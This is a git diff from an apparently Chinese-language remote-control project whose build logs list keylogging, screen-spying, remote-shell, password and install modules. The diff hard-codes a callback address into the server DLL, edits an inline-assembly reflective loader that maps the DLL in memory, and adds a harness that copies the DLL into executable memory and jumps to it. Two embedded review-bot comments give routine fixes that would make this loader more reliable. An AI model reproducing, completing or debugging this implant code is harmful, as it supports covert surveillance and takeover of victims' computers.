diff --git a/CcMainDll/.vs/CcMainDll/v15/.suo b/CcMainDll/.vs/CcMainDll/v15/.suo
index 6803887..4af1ec8 100644
Binary files a/CcMainDll/.vs/CcMainDll/v15/.suo and b/CcMainDll/.vs/CcMainDll/v15/.suo differ
diff --git a/CcMainDll/CcMainDll/Debug/CcMainDll.Build.CppClean.log b/CcMainDll/CcMainDll/Debug/CcMainDll.Build.CppClean.log
index 3d365a3..fae17d0 100644
--- a/CcMainDll/CcMainDll/Debug/CcMainDll.Build.CppClean.log
+++ b/CcMainDll/CcMainDll/Debug/CcMainDll.Build.CppClean.log
@@ -1,43 +1 @@
-f:\myapp\ccremote\bin\server\ccmaindll.lib
-f:\myapp\ccremote\bin\server\ccmaindll.exp
-f:\myapp\ccremote\bin\server\ccmaindll.ipdb
-f:\myapp\ccremote\bin\server\ccmaindll.iobj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.pch
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\vc141.pdb
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\vc141.idb
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\pch.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\audio.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\until.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\buffer.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\clientsocket.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\videomanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\videocap.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\systemmanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\shellmanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\servermanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\screenspy.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\screenmanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\regmanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\regeditopt.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\regeditex.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\manager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\keyboardmanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\kernelmanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\install.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\dialupass.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\audiomanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\filemanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\strcry.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\dllmain.obj
-f:\myapp\ccremote\bin\server\ccmaindll.ilk
-f:\myapp\ccremote\bin\server\ccmaindll.dll
-f:\myapp\ccremote\bin\server\ccmaindll.pdb
 f:\myapp\ccremote\ccmaindll\ccmaindll\..\..\bin\server\ccmaindll.dll
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\ccmaindll.write.1u.tlog
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\cl.command.1.tlog
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\cl.read.1.tlog
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\cl.write.1.tlog
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.command.1.tlog
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.delete.1.tlog
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.read.1.tlog
-f:\myapp\ccremote\ccmaindll\ccmaindll\debug\ccmaindll.tlog\link.write.1.tlog
diff --git a/CcMainDll/CcMainDll/Debug/CcMainDll.log b/CcMainDll/CcMainDll/Debug/CcMainDll.log
index 719bda5..beffc52 100644
--- a/CcMainDll/CcMainDll/Debug/CcMainDll.log
+++ b/CcMainDll/CcMainDll/Debug/CcMainDll.log
@@ -166,26 +166,24 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4838: 从“ f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4309: “初始化”: 截断常量值 f:\myapp\ccremote\ccmaindll\ccmaindll\common\login.h(231): warning C4996: 'GetVersionExA': 被声明为已否决 d:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(53): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(55): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(263): warning C4996: 'strncpy': This function or variable may be unsafe. Consider using strncpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(338): note: 参见“strncpy”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(264): warning C4996: 'wcstombs': This function or variable may be unsafe. Consider using wcstombs_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\stdlib.h(1015): note: 参见“wcstombs”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(294): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(230): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. 
To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(304): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(329): warning C4996: 'sprintf': This function or variable may be unsafe. Consider using sprintf_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(1774): note: 参见“sprintf”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(358): warning C4996: 'sprintf': This function or variable may be unsafe. Consider using sprintf_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(1774): note: 参见“sprintf”的声明 -f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(359): warning C4996: 'sprintf': This function or variable may be unsafe. Consider using sprintf_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. - d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(1774): note: 参见“sprintf”的声明 +f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(253): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details. + d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明 StrCry.cpp f:\myapp\ccremote\ccmaindll\ccmaindll\strcry.cpp(8): warning C4018: “<=”: 有符号/无符号不匹配 f:\myapp\ccremote\ccmaindll\ccmaindll\strcry.cpp(10): warning C4267: “=”: 从“size_t”转换到“char”,可能丢失数据 正在生成代码... 
+f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(416): warning C4731: “ReflectiveLoader”: 框架指针寄存器“ebp”被内联程序集代码修改
+f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(1091): warning C4731: “ReflectiveLoader”: 框架指针寄存器“ebp”被内联程序集代码修改
+f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(322): warning C4731: “GetCurrentPositionAddress”: 框架指针寄存器“ebp”被内联程序集代码修改
+f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(324): warning C4731: “GetCurrentPositionAddress”: 框架指针寄存器“ebp”被内联程序集代码修改
+f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(333): warning C4731: “call_ror_0xD”: 框架指针寄存器“ebp”被内联程序集代码修改
+f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(336): warning C4731: “call_ror_0xD”: 框架指针寄存器“ebp”被内联程序集代码修改
+f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(345): warning C4731: “calc_name_hash”: 框架指针寄存器“ebp”被内联程序集代码修改
+f:\myapp\ccremote\ccmaindll\ccmaindll\dllmain.cpp(368): warning C4731: “calc_name_hash”: 框架指针寄存器“ebp”被内联程序集代码修改
 LINK : warning LNK4044: 无法识别的选项“/Zc:strictStrings”;已忽略
 正在创建库 ..\..\bin\server\CcMainDll.lib 和对象 ..\..\bin\server\CcMainDll.exp
 LINK : warning LNK4098: 默认库“LIBCMT”与其他库的使用冲突;请使用 /NODEFAULTLIB:library
diff --git a/CcMainDll/CcMainDll/dllmain.cpp b/CcMainDll/CcMainDll/dllmain.cpp
index 36a90d1..b2f127e 100644
--- a/CcMainDll/CcMainDll/dllmain.cpp
+++ b/CcMainDll/CcMainDll/dllmain.cpp
@@ -20,7 +20,7 @@ struct Connect_Address
 char strIP[MAX_PATH];
 int nPort;
 char ActiveXKeyGuid[MAX_PATH]; // 查找创建的Guid
-}g_myAddress = { 0xCC28256,"",0,"" };
+}g_myAddress = { 0xCC28256,"127.0.0.1",8088,"" };
 char svcname[MAX_PATH];
@@ -392,9 +392,9 @@ enum LocalEnum
 exp_AddressOfNames = -0x40,
 AddressOfNameOrdinals = -0x44,
 lpflOldProtect = -0x48, // VirtualProtect的四个参数 保存老的保护方式
- var_4c = -0x4c,
- var_50 = -0x50,
- var_54 = -0x54,
+ Signature = -0x4c,
+ NumberOfSections = -0x50,
+ IndexOfSections = -0x54,
 var_58 = -0x58,
 var_5c = -0x5c,
 var_60 = -0x60,
@@ -403,7 +403,7 @@ enum LocalEnum
 address = -0x6c,
 var_70 = -0x70,
 EntryPoint = -0x74, // 入口点
- NewMemAddress = -0x78 // 申请用来展开PE的内存地址
+ NewMemAddress = -0x78 // 申请用来展开PE的内存地址
 };
@@ -423,7 +423,7 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
 jnz initLocalVar
 call GetCurrentPositionAddress // 获取当前位置地址
- mov eax, buffer
+ //mov eax, buffer
 mov [ebp + PEAddress], eax // 保存当前代码所在的地址 PEAddress
 addressAdd :
 mov eax, 1
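Review bot: The removed instruction is left behind as the commented-out line `//mov eax, buffer` in the `@@ -423` hunk; delete it outright, or replace it with a comment that records why the value already in eax after `call GetCurrentPositionAddress` is now stored straight into `[ebp + PEAddress]` (presumably the call's return value, but that is not visible here), e.g. `// eax from GetCurrentPositionAddress is used as PEAddress directly`. Dead code kept as a comment tends to be restored later without the reason it was dropped. ReflectiveLoader begins and ends outside this hunk.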
@@ -718,39 +718,39 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
 mov edx, [ebp+PEAddress]
 mov eax, [ebp+PEAddress]
 add eax, [edx+3Ch]
- mov [ebp+var_4c], eax
+ mov [ebp+Signature], eax
 push 0x04 // PAGE_READWRITE 区域不可执行代码,应用程序可以读写该区域
 push 0x3000 // MEM_COMMIT | MEM_RESERV
- mov ecx, [ebp+var_4c]
+ mov ecx, [ebp+Signature]
 mov edx, [ecx+0x50] // PE signature 0x18 + 0x38 SizeOfImage 映像装入内存后的总大小
 add edx, 0x3C00000 // dwSize
 push edx
 push 0x0
 call [ebp+ pVirtualAlloc] // 申请一块 0x3C0000+SizeOfImage大小的内存
 mov [ebp+NewMemAddress], eax // NewMemAddress = 申请的内存地址
- mov eax, [ebp+var_4c] // var_4c = signature
+ mov eax, [ebp+Signature] // Signature = signature
 mov ecx, [eax+0x54] // ecx = SizeOfHeaders 0x18 + 0x3c
 mov [ebp+varLocalFS30_B], ecx
 mov edx, [ebp+PEAddress] // PEAddress = 4D5A address
 mov [ebp+BaseDllName], edx // BaseDllName = PEAddress
 mov eax, [ebp+NewMemAddress]
 mov [ebp+name_hash], eax // name_hash = mem_address
- mov ecx, [ebp+var_4c]
+ mov ecx, [ebp+Signature]
 movzx edx, word ptr [ecx+0x14] // edx = WORD SizeOfOptionalHeader
- mov eax, [ebp+var_4c]
+ mov eax, [ebp+Signature]
 lea ecx, [eax+edx+0x18] // signature + SizeOfOptionalHeader + sizeof signature = struct _IMAGE_SECTION_HEADER address 区段地址
 mov [ebp+varLocalFS30_B], ecx // varLocalFS30_B = 区段地址
- mov edx, [ebp+var_4c]
+ mov edx, [ebp+Signature]
 movzx eax, word ptr [edx+0x06] // signature + 0x04 + 0x02
- mov [ebp+var_50], eax // var_50 = NumberOfSections 节的数量
+ mov [ebp+NumberOfSections], eax // NumberOfSections = NumberOfSections 节的数量
 loc_463585:
- mov ecx, [ebp+var_50]
- mov [ebp+var_54], ecx // var_54 = 剩余要处理的Sections数量 index
- mov edx, [ebp+var_50]
+ mov ecx, [ebp+NumberOfSections]
+ mov [ebp+IndexOfSections], ecx // IndexOfSections = 剩余要处理的Sections数量 index
+ mov edx, [ebp+NumberOfSections]
 sub edx, 1
- mov [ebp+var_50], edx
- cmp dword ptr[ebp+var_54], 0 // 区段是否都处理了
+ mov [ebp+NumberOfSections], edx
+ cmp dword ptr[ebp+IndexOfSections], 0 // 区段是否都处理了
 jz loc_463614
 mov eax, [ebp+varLocalFS30_B] // varLocalFS30_B = 区段地址
 mov ecx, [ebp+NewMemAddress] // NewMemAddress = mem_address
@@ -803,7 +803,7 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
 loc_463614:
 mov ecx, 8
 shl ecx, 0 // [1] 数据目录表第二项 导入表 IMAGE_DIRECTORY_ENTRY_IMPORT
- mov edx, [ebp+var_4c] // var_4c = signature
+ mov edx, [ebp+Signature] // Signature = signature
 lea eax, [edx+ecx+0x78] // 0x78 + 0x08
 mov [ebp+BaseDllName], eax
 mov ecx, [ebp+BaseDllName]
@@ -906,13 +906,13 @@ loc_46371B:
 jmp loc_463631 // 下一个导入表结构
 loc_463729:
- mov eax, [ebp+var_4c] // var_4c = signature
+ mov eax, [ebp+Signature] // Signature = signature
 mov ecx, [ebp+NewMemAddress] // NewMemAddress = mem_address
 sub ecx, [eax+0x34] // 当前加载基址 - 默认加载基址 meMaddress - ImageBase
 mov [ebp+address], ecx
 mov edx, 8
 imul eax, edx, 5 // 第6个表 重定位表
- mov ecx, [ebp+var_4c]
+ mov ecx, [ebp+Signature]
 lea edx, [ecx+eax+0x78]
 mov [ebp+BaseDllName], edx
 mov eax, [ebp+BaseDllName]
@@ -1060,7 +1060,7 @@ loc_4638E1:
 loc_4638F2:
- mov edx, [ebp+var_4c] // var_4c = signature
+ mov edx, [ebp+Signature] // Signature = signature
 mov eax, [ebp+NewMemAddress] // NewMemAddress = mem_address
 add eax, [edx+0x28] // 入口点
 mov [ebp+EntryPoint], eax
diff --git a/CcMainDll/TestLoadDll/Debug/TestLoadDll.log b/CcMainDll/TestLoadDll/Debug/TestLoadDll.log
index 462cbac..b440f42 100644
--- a/CcMainDll/TestLoadDll/Debug/TestLoadDll.log
+++ b/CcMainDll/TestLoadDll/Debug/TestLoadDll.log
@@ -1,3 +1,6 @@
 C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
 TestLoadDll.cpp
+f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(22): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
+ d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
+f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(119): warning C4700: 使用了未初始化的局部变量“lpflOldProtect”
 TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
diff --git a/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log b/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log
index 0186fd2..f1eb298 100644
--- a/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log
+++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log
@@ -1 +1,14 @@
-g:\ccremote\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe
+f:\myapp\ccremote\ccmaindll\testloaddll\release\vc141.pdb
+f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.obj
+f:\myapp\ccremote\bin\server\testloaddll.exe
+f:\myapp\ccremote\bin\server\testloaddll.pdb
+f:\myapp\ccremote\bin\server\testloaddll.ipdb
+f:\myapp\ccremote\bin\server\testloaddll.iobj
+f:\myapp\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe
+f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\cl.command.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\cl.read.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\cl.write.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\link.command.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\link.read.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\link.write.1.tlog
+f:\myapp\ccremote\ccmaindll\testloaddll\release\testloaddll.tlog\testloaddll.write.1u.tlog
diff --git a/CcMainDll/TestLoadDll/Release/TestLoadDll.log b/CcMainDll/TestLoadDll/Release/TestLoadDll.log
index a8aad37..2271ea3 100644
--- a/CcMainDll/TestLoadDll/Release/TestLoadDll.log
+++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.log
@@ -1,6 +1,9 @@
-G:\VS2017\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
+C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
 TestLoadDll.cpp
+f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(23): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
+ d:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
 正在生成代码
- All 171 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+f:\myapp\ccremote\ccmaindll\testloaddll\testloaddll.cpp(120): warning C4700: 使用了未初始化的局部变量“lpflOldProtect”
+ All 161 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
 已完成代码的生成
- TestLoadDll.vcxproj -> G:\CcRemote\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
+ TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
diff --git a/CcMainDll/TestLoadDll/Release/TestLoadDll.tlog/TestLoadDll.lastbuildstate b/CcMainDll/TestLoadDll/Release/TestLoadDll.tlog/TestLoadDll.lastbuildstate
index fd0ad53..3f4a20c 100644
--- a/CcMainDll/TestLoadDll/Release/TestLoadDll.tlog/TestLoadDll.lastbuildstate
+++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.tlog/TestLoadDll.lastbuildstate
@@ -1,2 +1,2 @@
 #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
-Release|Win32|G:\CcRemote\CcRemote\CcMainDll\|
+Release|Win32|F:\myapp\CcRemote\CcMainDll\|
diff --git a/CcMainDll/TestLoadDll/TestLoadDll.cpp b/CcMainDll/TestLoadDll/TestLoadDll.cpp
index f01b85d..416654f 100644
--- a/CcMainDll/TestLoadDll/TestLoadDll.cpp
+++ b/CcMainDll/TestLoadDll/TestLoadDll.cpp
@@ -4,9 +4,88 @@
 #include
 #include
-int main()
+
+
+FILE * pFile;
+
+long lSize;
+
+char * buffer;
+
+size_t result;
+bool InitTestReflectiveLoader()
 {
- std::cout << "Hello World!\n";
+
+
+ // 一个不漏地读入整个文件,只能采用二进制方式打开
+
+ //pFile = fopen(".\\..\\..\\bin\\server\\CcMainDll.dll", "rb");
+ pFile = fopen("C:\\Users\\b\\Desktop\\bin\\server\\CcMainDll.dll", "rb");
+
+ if (pFile == NULL)
+
+ {
+
+ fputs("File error", stderr);
+
+ printf("open file fail");
+
+ return false;
+
+ }
+
+
+
+ // 获取文件大小
+
+ fseek(pFile, 0, SEEK_END);
+
+ lSize = ftell(pFile);
+
+ rewind(pFile);
+
+
+
+ // 分配内存存储整个文件
+
+ buffer = (char*)VirtualAlloc(NULL , sizeof(char)*lSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+ if (buffer == NULL)
+
+ {
+
+ fputs("Memory error", stderr);
+
+ printf("Memory alloc falil");
+
+ return false;
+
+ }
+
+
+
+ // 将文件拷贝到buffer中
+
+ result = fread(buffer, 1, lSize, pFile);
+
+ if (result != lSize)
+
+ {
+
+ fputs("Reading error", stderr);
+
+ printf("Load file to memory falil");
+
+ return false;
+
+ }
+ return true;
+
+}
+
+void loadCcmainDllExp()
+{
+ std::cout << "Hello World!\n";
 //载入服务端dll hijack test
 HMODULE hServerDll = LoadLibrary(".\\..\\..\\bin\\server\\CcMainDll.dll");
@@ -32,3 +111,16 @@ int main()
 }
 }
+
+int main()
+{
+
+ InitTestReflectiveLoader();
+ PDWORD lpflOldProtect;
+ VirtualProtect(buffer, lSize, PAGE_EXECUTE_READWRITE, lpflOldProtect);
+ __asm {
+ call buffer
+ }
+
+ return 0;
+}
diff --git a/CcMainDll/TestLoadDll/TestLoadDll.vcxproj b/CcMainDll/TestLoadDll/TestLoadDll.vcxproj
index a3c364d..7491d89 100644
--- a/CcMainDll/TestLoadDll/TestLoadDll.vcxproj
+++ b/CcMainDll/TestLoadDll/TestLoadDll.vcxproj
@@ -92,7 +92,7 @@
 MaxSpeed
 true
 true
- true
+ false
 WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
 true
 MultiThreadedDebug
@@ -110,7 +110,7 @@
 Level3
 Disabled
- true
+ false
 WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
 true
 MultiThreadedDebug
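Review bot: InitTestReflectiveLoader never closes `pFile` and never releases `buffer` on any of its return paths, and the calls that can fail are only partly checked: `ftell` may return -1, which then flows unchecked into the `VirtualAlloc` size and the `fread` length, and `result != lSize` compares a `size_t` against a `long`. Add a guard right after `lSize = ftell(pFile);` such as `if (lSize < 0) { fclose(pFile); return false; }`, compare with `result != (size_t)lSize`, and call `fclose(pFile)` before every `return` (the handle is not needed once `fread` has completed). In the `@@ -32,3 +111,16` hunk of the same file the `bool` returned by `InitTestReflectiveLoader()` is discarded, so a failed open or read still reaches `VirtualProtect` with the zero-initialised global `buffer`, and `lpflOldProtect` is passed uninitialised — the C4700 warning recorded in both TestLoadDll.log hunks on this page — where the last argument must be the address of a `DWORD` local, e.g. `DWORD oldProtect;` and `&oldProtect`. The two `printf` messages spelt `falil` should read `fail`.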
diff --git a/bin/server/CcMainDll.dll b/bin/server/CcMainDll.dll
index 03e37bb..1dd1147 100644
Binary files a/bin/server/CcMainDll.dll and b/bin/server/CcMainDll.dll differ
diff --git a/bin/server/TestLoadDll.exe b/bin/server/TestLoadDll.exe
index e8f4295..1be63e4 100644
Binary files a/bin/server/TestLoadDll.exe and b/bin/server/TestLoadDll.exe differ